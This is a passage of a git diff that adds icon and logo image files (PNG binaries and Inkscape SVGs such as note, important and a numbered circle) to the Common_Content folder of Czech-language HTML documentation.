0.32096,0.237957 0.53125,0.315429 0.210283,0.07194 0.453772,0.107912 0.730469,0.10791 0.581049,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.43164,-1.087402 -6e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218593,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.320969,-0.307125 -0.514648,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 15.662062,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664063,0.398438 -0.199222,0.138351 -0.370772,0.293299 -0.514648,0.464844 -0.13835,0.16602 -0.24626,0.348637 -0.323731,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.701661,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514649,0.08301 -0.154952,0.05535 -0.290531,0.13559 -0.406738,0.240723 -0.110681,0.105153 -0.199223,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282226,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160478,0.09962 0.32926,0.199226 0.506348,0.298828 0.171545,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154943,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.12174,-0.138338 0.218582,-0.293286 0.290528,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.157721,-0.284984 -0.273926,-0.390137 -0.116217,-0.105133 -0.254563,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/9.png b/tmp/cs-CZ/html/Common_Content/images/9.png
new file mode 100644
index 000000000..a2972dbc2
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/9.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/9.svg b/tmp/cs-CZ/html/Common_Content/images/9.svg
new file mode 100644
index 000000000..c488b6e4f
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/9.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.829054,15.052383 c -9e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340333,1.651856 -0.160489,0.525719 -0.381843,1.018232 -0.664062,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426113,0.332032 -0.940761,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.30046,0.282227 -2.108399,0.282227 -0.116214,0 -0.243492,-0.0028 -0.381836,-0.0083 -0.138348,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273927,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237954,0.02767 0.478676,0.04151 0.722168,0.0415 0.747067,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.481441,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.282221,-0.337562 0.481439,-0.738766 0.597657,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.107911,0 c -0.110683,0.199225 -0.243495,0.384609 -0.398437,0.556153 -0.154954,0.171554 -0.337571,0.320968 -0.547852,0.448242 -0.210291,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.265629,0.07194 -0.56169,0.107914 -0.888183,0.10791 -0.52572,4e-6 -0.998864,-0.08577 -1.419434,-0.257324 -0.420575,-0.171545 -0.777508,-0.420568 -1.070801,-0.74707 -0.287761,-0.326492 -0.509115,-0.727696 -0.664062,-1.203614 -0.154949,-0.475904 -0.232423,-1.020988 -0.232422,-1.635253 -10e-7,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453774,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758135,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043127,-0.2905151 1.651855,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520176,0.210298 0.971184,0.534028 1.353027,0.971192 0.381829,0.437185 0.683423,0.990569 0.904786,1.660156 0.221345,0.669605 0.332022,1.458178 0.332031,2.365722 m -4.216797,-3.262207 c -0.226892,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188154,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132815,0.171559 -0.237959,0.392913 -0.315429,0.664062 -0.07194,0.265634 -0.107914,0.581063 -0.107911,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373536,1.394532 0.249019,0.343105 0.625321,0.514654 1.128906,0.514648 0.254552,6e-6 0.486974,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.53955,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124506,-0.401197 0.124512,-0.605958 -6e-6,-0.282218 -0.03598,-0.561677 -0.10791,-0.838378 -0.06641,-0.282218 -0.171556,-0.534008 -0.31543,-0.755372 -0.138352,-0.226878 -0.312668,-0.409495 -0.522949,-0.547851 -0.204758,-0.138336 -0.44548,-0.207509 -0.722168,-0.20752"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/dot.png b/tmp/cs-CZ/html/Common_Content/images/dot.png
new file mode 100644
index 000000000..077ecd4b5
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/dot.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/dot2.png b/tmp/cs-CZ/html/Common_Content/images/dot2.png
new file mode 100644
index 000000000..8348fcd05
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/dot2.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/green.png b/tmp/cs-CZ/html/Common_Content/images/green.png
new file mode 100644
index 000000000..ebb3c247d
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/green.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/h1-bg.png b/tmp/cs-CZ/html/Common_Content/images/h1-bg.png
new file mode 100644
index 000000000..d67e9b9e8
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/h1-bg.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/image_left.png b/tmp/cs-CZ/html/Common_Content/images/image_left.png
new file mode 100644
index 000000000..4f742e0e1
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/image_left.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/image_right.png b/tmp/cs-CZ/html/Common_Content/images/image_right.png
new file mode 100644
index 000000000..63d7ac214
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/image_right.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/important.png b/tmp/cs-CZ/html/Common_Content/images/important.png
new file mode 100644
index 000000000..969562b7b
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/important.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/important.svg b/tmp/cs-CZ/html/Common_Content/images/important.svg
new file mode 100644
index 000000000..064c783b5
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/important.svg
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg2">
+  <defs
+     id="defs5" />
+  <path
+     d="M 255.25,-411.29002 L 261.86798,-400.85887 L 273.83367,-397.7882 L 265.95811,-388.27072 L 266.73534,-375.94179 L 255.25,-380.49082 L 243.76466,-375.94179 L 244.54189,-388.27072 L 236.66633,-397.7882 L 248.63202,-400.85887 L 255.25,-411.29002 z "
+     transform="matrix(1.1071323,0,0,1.1071323,-258.4137,459.98052)"
+     style="fill:#2e3436;fill-opacity:1;stroke:#2e3436;stroke-width:4.25880718;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4450" />
+  <path
+     d="M 255.25,-411.29002 L 261.86798,-400.85887 L 273.83367,-397.7882 L 265.95811,-388.27072 L 266.73534,-375.94179 L 255.25,-380.49082 L 243.76466,-375.94179 L 244.54189,-388.27072 L 236.66633,-397.7882 L 248.63202,-400.85887 L 255.25,-411.29002 z "
+     transform="matrix(1.1071323,0,0,1.1071323,-258.4137,459.98052)"
+     style="fill:#fac521;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4452" />
+  <path
+     d="M 24.175987,4.476098 L 16.980534,16.087712 L 3.9317841,19.443104 L 16.980534,20.076901 L 24.175987,10.383543 L 31.408721,20.076901 L 44.457471,19.443104 L 31.468862,16.027571 L 24.175987,4.476098 z "
+     style="fill:#feeaab;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4531" />
+  <path
+     d="M 12.456856,24.055852 C 11.65845,24.299685 14.436112,29.177769 14.436112,32.041127 C 14.436112,37.343117 13.010825,39.831516 15.971742,37.364645 C 18.711008,35.08244 21.184735,34.873512 24.195894,34.873512 C 27.207053,34.873512 29.646656,35.08244 32.38592,37.364645 C 35.346837,39.831516 33.921551,37.343117 33.92155,32.041127 C 33.92155,28.223316 38.868232,20.827013 33.682674,25.591482 C 31.458295,27.635233 27.413886,29.481744 24.195894,29.481744 C 20.977903,29.481744 16.933493,27.635233 14.709113,25.591482 C 13.412724,24.400365 12.722992,23.974574 12.456856,24.055852 z "
+     style="fill:#fcd867;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path2185" />
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/note.png b/tmp/cs-CZ/html/Common_Content/images/note.png
new file mode 100644
index 000000000..d04775d99
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/note.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/note.svg b/tmp/cs-CZ/html/Common_Content/images/note.svg
new file mode 100644
index 000000000..abe5a6024
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/note.svg
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg2">
+  <defs
+     id="defs5" />
+  <path
+     d="M 30.27396,4.1232594 L 18.765811,4.1232594 C 11.476786,4.1232594 5.5574109,10.546411 5.5574109,19.960741 C 5.5574109,24.746615 7.0844878,29.075948 9.5403943,32.177328 C 9.4616811,32.681104 9.414455,33.200619 9.414455,33.720144 C 9.414455,39.308917 13.554865,43.591015 18.891751,44.267966 C 17.506371,42.693663 16.656245,40.914707 16.656245,38.616218 C 16.656245,38.01799 16.719219,37.419752 16.82942,36.837262 C 17.459135,36.963202 18.104599,37.026176 18.750063,37.026176 L 30.258211,37.026176 C 37.547237,37.026176 43.466612,29.39081 43.466612,19.960741 C 43.466612,10.530672 37.578724,4.1232594 30.27396,4.1232594 z "
+     style="fill:#2e3436;fill-opacity:1;stroke:#2e3436;stroke-width:4.7150631;stroke-miterlimit:4;stroke-dasharray:none"
+     id="path4317" />
+  <path
+     d="M 30.27396,4.1232594 L 18.765811,4.1232594 C 11.476786,4.1232594 5.5574109,10.546411 5.5574109,19.960741 C 5.5574109,24.746615 7.0844878,29.075948 9.5403943,32.177328 C 9.4616811,32.681104 9.414455,33.200619 9.414455,33.720144 C 9.414455,39.308917 13.554865,43.591015 18.891751,44.267966 C 17.506371,42.693663 16.656245,40.914707 16.656245,38.616218 C 16.656245,38.01799 16.719219,37.419752 16.82942,36.837262 C 17.459135,36.963202 18.104599,37.026176 18.750063,37.026176 L 30.258211,37.026176 C 37.547237,37.026176 43.466612,29.39081 43.466612,19.960741 C 43.466612,10.530672 37.578724,4.1232594 30.27396,4.1232594 z "
+     style="fill:#bfdce8;fill-opacity:1"
+     id="path142" />
+  <path
+     d="M 19.200879,5.5648899 C 12.490241,5.5648899 7.0622987,11.295775 7.0622987,19.690323 C 7.0622987,22.890926 7.8418023,25.879852 9.1910836,28.332288 C 8.6113289,26.599889 8.2852163,24.667826 8.2852163,22.673336 C 8.2852163,14.629768 13.495502,9.1620492 19.925575,9.1620492 L 30.071259,9.1620492 C 36.515213,9.1620492 41.711609,14.616311 41.711609,22.673336 C 41.864688,21.709218 41.983366,20.710908 41.983366,19.690323 C 41.983366,11.281743 36.524624,5.5648899 29.799492,5.5648899 L 19.200879,5.5648899 z "
+     style="fill:#ffffff"
+     id="path2358" />
+  <path
+     d="M 28.241965,33.725087 L 20.792252,33.725087 C 16.073756,33.725087 12.241894,32.944782 12.241894,26.850486 C 12.241894,25.10387 12.368512,23.572125 15.515722,23.567487 L 33.508301,23.540969 C 36.182481,23.537028 36.782127,24.950794 36.782127,26.850486 C 36.782127,32.95497 32.970649,33.725087 28.241965,33.725087 z "
+     style="fill:#d0ecf9;fill-opacity:1"
+     id="path2173" />
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/red.png b/tmp/cs-CZ/html/Common_Content/images/red.png
new file mode 100644
index 000000000..d32d5e2e8
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/red.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/shine.png b/tmp/cs-CZ/html/Common_Content/images/shine.png
new file mode 100644
index 000000000..7d736bdef
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/shine.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/stock-go-back.png b/tmp/cs-CZ/html/Common_Content/images/stock-go-back.png
new file mode 100644
index 000000000..0f26df330
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/stock-go-back.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/stock-go-forward.png b/tmp/cs-CZ/html/Common_Content/images/stock-go-forward.png
new file mode 100644
index 000000000..4bcbf0296
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/stock-go-forward.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/stock-go-up.png b/tmp/cs-CZ/html/Common_Content/images/stock-go-up.png
new file mode 100644
index 000000000..8bcf9e725
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/stock-go-up.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/stock-home.png b/tmp/cs-CZ/html/Common_Content/images/stock-home.png
new file mode 100644
index 000000000..f37ef3d1b
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/stock-home.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/title_logo.png b/tmp/cs-CZ/html/Common_Content/images/title_logo.png
new file mode 100644
index 000000000..75fd5035c
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/title_logo.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/title_logo.svg b/tmp/cs-CZ/html/Common_Content/images/title_logo.svg
new file mode 100644
index 000000000..05cc1c4cd
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/title_logo.svg
@@ -0,0 +1,350 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:dc="http://purl.org/dc/elements/1.1/"
+   xmlns:cc="http://creativecommons.org/ns#"
+   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:xlink="http://www.w3.org/1999/xlink"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   version="1.1"
+   width="253.10916"
+   height="195.16167"
+   id="svg2"
+   style="enable-background:new">
+  <defs
+     id="defs5">
+    <linearGradient
+       id="linearGradient6430">
+      <stop
+         id="stop6432"
+         style="stop-color:#ce0000;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop6434"
+         style="stop-color:#e90000;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3218">
+      <stop
+         id="stop3220"
+         style="stop-color:#000000;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3222"
+         style="stop-color:#555753;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3210">
+      <stop
+         id="stop3212"
+         style="stop-color:#edd400;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3214"
+         style="stop-color:#fce94f;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3558">
+      <stop
+         id="stop3560"
+         style="stop-color:#4bc6ff;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3562"
+         style="stop-color:#1fb7ff;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient2652">
+      <stop
+         id="stop2654"
+         style="stop-color:#ef5d29;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop2656"
+         style="stop-color:#ef2929;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3770">
+      <stop
+         id="stop3772"
+         style="stop-color:#999999;stop-opacity:0"
+         offset="0" />
+      <stop
+         id="stop3774"
+         style="stop-color:#cccccc;stop-opacity:1"
+         offset="0.28968501" />
+      <stop
+         id="stop3776"
+         style="stop-color:#cccccc;stop-opacity:1"
+         offset="0.72421253" />
+      <stop
+         id="stop3778"
+         style="stop-color:#999999;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3578">
+      <stop
+         id="stop3580"
+         style="stop-color:#999999;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3582"
+         style="stop-color:#ffffff;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       x1="292.98209"
+       y1="248.94519"
+       x2="292.71686"
+       y2="254.84595"
+       id="linearGradient3605"
+       xlink:href="#linearGradient3578"
+       gradientUnits="userSpaceOnUse" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3607"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4079.057)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3609"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4082.0622)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3611"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4085.0674)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3613"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4088.0726)" />
+    <radialGradient
+       cx="308.00009"
+       cy="237.60178"
+       r="13.826746"
+       fx="308.00009"
+       fy="237.60178"
+       id="radialGradient3615"
+       xlink:href="#linearGradient2652"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(-2.470026,1.2123383,-2.5289897,-1.8798194,1652.7116,307.88628)" />
+    <radialGradient
+       cx="313.97348"
+       cy="257.40872"
+       r="4.0046649"
+       fx="313.97348"
+       fy="257.40872"
+       id="radialGradient3617"
+       xlink:href="#linearGradient3558"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(-1.2239386,0.8005673,-1.1669368,-1.1126277,983.68752,289.08822)" />
+    <linearGradient
+       x1="121.62237"
+       y1="166.88406"
+       x2="121.62236"
+       y2="63.590191"
+       id="linearGradient3216"
+       xlink:href="#linearGradient3210"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.9919329,0,0,0.9919329,-57.187787,-52.294514)" />
+    <linearGradient
+       x1="282.13562"
+       y1="198.85522"
+       x2="282.13562"
+       y2="220.4299"
+       id="linearGradient3224"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="translate(-58.623593,-52.746766)" />
+    <linearGradient
+       x1="282.13562"
+       y1="198.85522"
+       x2="282.13562"
+       y2="220.4299"
+       id="linearGradient6356"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="translate(-58.623593,-49.548418)" />
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6426">
+      <feGaussianBlur
+         stdDeviation="1.3718847"
+         id="feGaussianBlur6428" />
+    </filter>
+    <linearGradient
+       x1="313.12421"
+       y1="234.06723"
+       x2="300.74551"
+       y2="252.48558"
+       id="linearGradient6436"
+       xlink:href="#linearGradient6430"
+       gradientUnits="userSpaceOnUse" />
+    <filter
+       x="-0.049464952"
+       y="-0.10498104"
+       width="1.0989299"
+       height="1.2099621"
+       color-interpolation-filters="sRGB"
+       id="filter6542">
+      <feGaussianBlur
+         stdDeviation="2.6872547"
+         id="feGaussianBlur6544" />
+    </filter>
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6596">
+      <feGaussianBlur
+         stdDeviation="1.7274814"
+         id="feGaussianBlur6598" />
+    </filter>
+    <linearGradient
+       x1="180"
+       y1="163.62605"
+       x2="180"
+       y2="66.188019"
+       id="linearGradient6600"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse" />
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6626">
+      <feBlend
+         in2="BackgroundImage"
+         mode="multiply"
+         id="feBlend6628" />
+    </filter>
+  </defs>
+  <path
+     d="m 192.86534,56.061481 c -0.50361,-0.05952 -15.81743,15.539777 -22.98246,22.59399 6.39469,-2.022962 17.37512,-5.797322 18.87496,-5.619699 1.50061,0.17761 10.05669,6.287721 15.14374,9.668178 -3.44524,-8.295783 -10.53195,-26.582844 -11.03624,-26.642469 z m 63.7003,19.617933 c -0.36861,-0.209237 -30.19021,6.665429 -43.89415,9.694631 7.65259,0.542544 21.08672,1.231768 22.18456,1.854212 1.09971,0.623611 1.92541,8.064764 2.67487,12.283088 5.91959,-7.418443 19.40383,-23.62268 19.03472,-23.831931 z M 125.42293,59.592937 c -0.44655,0.1125 4.65988,18.477033 6.76635,26.856382 2.69189,-3.815347 6.93512,-10.632649 8.26418,-10.967772 1.33082,-0.335537 14.41073,2.134145 21.88974,3.381693 -11.49464,-6.001218 -36.47343,-19.382928 -36.92027,-19.270303 z m 164.80534,51.680193 c -0.0928,-0.27855 -33.04307,-4.73423 -48.04185,-6.88709 5.99277,2.90065 16.78887,7.80145 17.06501,8.63065 0.27649,0.83069 -6.98832,6.74108 -10.86175,10.18944 13.01804,-3.70914 41.93138,-11.65403 41.83859,-11.933 z M 125.48113,90.005528 C 110.30347,88.587271 77.076206,85.20923 76.857612,85.45104 c -0.218602,0.241871 23.348278,14.363657 33.917068,20.87246 -2.03696,-4.14784 -6.10707,-11.394242 -5.45553,-12.114888 0.65021,-0.719302 13.13762,-2.842685 20.16198,-4.203084 z m 121.66254,38.409332 c 2.03703,4.14807 6.10691,11.39426 5.45552,12.11488 -0.65033,0.7193 -13.13757,2.84269 -20.1619,4.20306 15.17775,1.41825 48.40491,4.79631 48.62348,4.5545 0.21866,-0.24186 -23.3483,-14.36365 -33.9171,-20.87244 z M 107.57689,111.87714 c -13.017795,3.70908 -41.931322,11.654 -41.838422,11.93314 0.09271,0.27847 33.043041,4.73405 48.041762,6.88692 -5.9926,-2.90067 -16.788896,-7.80154 -17.064854,-8.63067 -0.276569,-0.83079 6.988304,-6.74109 10.861514,-10.18939 z M 225.72916,148.289 c -2.69194,3.81535 -6.93504,10.63266 -8.26422,10.9678 -1.33087,0.33555 -14.41072,-2.13415 -21.88976,-3.38169 11.49463,6.00121 36.47352,19.38299 36.92049,19.27028 0.44622,-0.11245 -4.66012,-18.477 -6.76651,-26.85639 z M 118.43579,135.57189 c -5.91956,7.41845 -19.403773,23.62269 -19.034599,23.83193 0.36839,0.20917 30.190049,-6.66543 43.894159,-9.69464 -7.65284,-0.54256 -21.08673,-1.23178 -22.1848,-1.85426 -1.09959,-0.62357 -1.92533,-8.06468 -2.67476,-12.28303 z m 67.64804,20.85589 c -6.39469,2.02298 -17.37508,5.79732 -18.87493,5.61969 -1.50044,-0.17764 -10.05685,-6.28769 -15.14375,-9.66826 3.44522,8.29578 10.53209,26.58297 11.03633,26.64251 0.50342,0.0594 15.81741,-15.53967 22.98235,-22.59394 z"
+     transform="matrix(1,0,0,1.0406634,-58.623593,-54.026411)"
+     id="path6546"
+     style="opacity:0.35096154;fill:url(#linearGradient6600);fill-opacity:1;filter:url(#filter6596)" />
+  <path
+     d="m 134.24175,3.3147155 c -0.50361,-0.05952 -15.81743,15.5397765 -22.98246,22.5939895 6.39469,-2.022962 17.37512,-5.797322 18.87496,-5.619699 1.50061,0.17761 10.05669,6.287721 15.14374,9.668178 C 141.83275,21.661401 134.74604,3.3743405 134.24175,3.3147155 z m 63.7003,19.6179325 c -0.36861,-0.209237 -30.19021,6.665429 -43.89415,9.694631 7.65259,0.542544 21.08672,1.231768 22.18456,1.854212 1.09971,0.623611 1.92541,8.064764 2.67487,12.283088 5.91959,-7.418443 19.40383,-23.62268 19.03472,-23.831931 z M 66.799337,6.8461715 c -0.44655,0.1125 4.65988,18.4770325 6.76635,26.8563815 2.69189,-3.815347 6.93512,-10.632649 8.26418,-10.967772 1.33082,-0.335537 14.41073,2.134145 21.889743,3.381693 C 92.224967,20.115256 67.246177,6.7335465 66.799337,6.8461715 z M 231.60468,58.526364 c -0.0928,-0.27855 -33.04307,-4.73423 -48.04185,-6.88709 5.99277,2.90065 16.78887,7.80145 17.06501,8.63065 0.27649,0.83069 -6.98832,6.74108 -10.86175,10.18944 13.01804,-3.70914 41.93138,-11.65403 41.83859,-11.933 z M 66.857537,37.258762 c -15.17766,-1.418257 -48.404924,-4.796298 -48.623518,-4.554488 -0.218602,0.241871 23.348278,14.363657 33.917068,20.87246 -2.03696,-4.14784 -6.10707,-11.394242 -5.45553,-12.114888 0.65021,-0.719302 13.13762,-2.842685 20.16198,-4.203084 z M 188.52008,75.668094 c 2.03703,4.14807 6.10691,11.39426 5.45552,12.11488 -0.65033,0.7193 -13.13757,2.84269 -20.1619,4.20306 15.17775,1.41825 48.40491,4.79631 48.62348,4.5545 0.21866,-0.24186 -23.3483,-14.36365 -33.9171,-20.87244 z M 48.953297,59.130374 c -13.017795,3.70908 -41.9313217,11.654 -41.8384217,11.93314 0.09271,0.27847 33.0430407,4.73405 48.0417617,6.88692 -5.9926,-2.90067 -16.788896,-7.80154 -17.064854,-8.63067 -0.276569,-0.83079 6.988304,-6.74109 10.861514,-10.18939 z m 118.152273,36.41186 c -2.69194,3.81535 -6.93504,10.632656 -8.26422,10.967796 -1.33087,0.33555 -14.41072,-2.13415 -21.88976,-3.38169 11.49463,6.00121 36.47352,19.38299 36.92049,19.27028 0.44622,-0.11245 -4.66012,-18.477 -6.76651,-26.856386 z M 59.812197,82.825124 c -5.91956,7.41845 -19.403773,23.622686 -19.034599,23.831926 0.36839,0.20917 30.190049,-6.665426 43.894159,-9.694636 -7.65284,-0.54256 -21.08673,-1.23178 -22.1848,-1.85426 -1.09959,-0.62357 -1.92533,-8.06468 -2.67476,-12.28303 z m 67.648043,20.855886 c -6.39469,2.02298 -17.37508,5.79732 -18.87493,5.61969 -1.50044,-0.17764 -10.056853,-6.28769 -15.143753,-9.668256 3.44522,8.295776 10.532093,26.582966 11.036333,26.642506 0.50342,0.0594 15.81741,-15.53967 22.98235,-22.59394 z"
+     id="path3766"
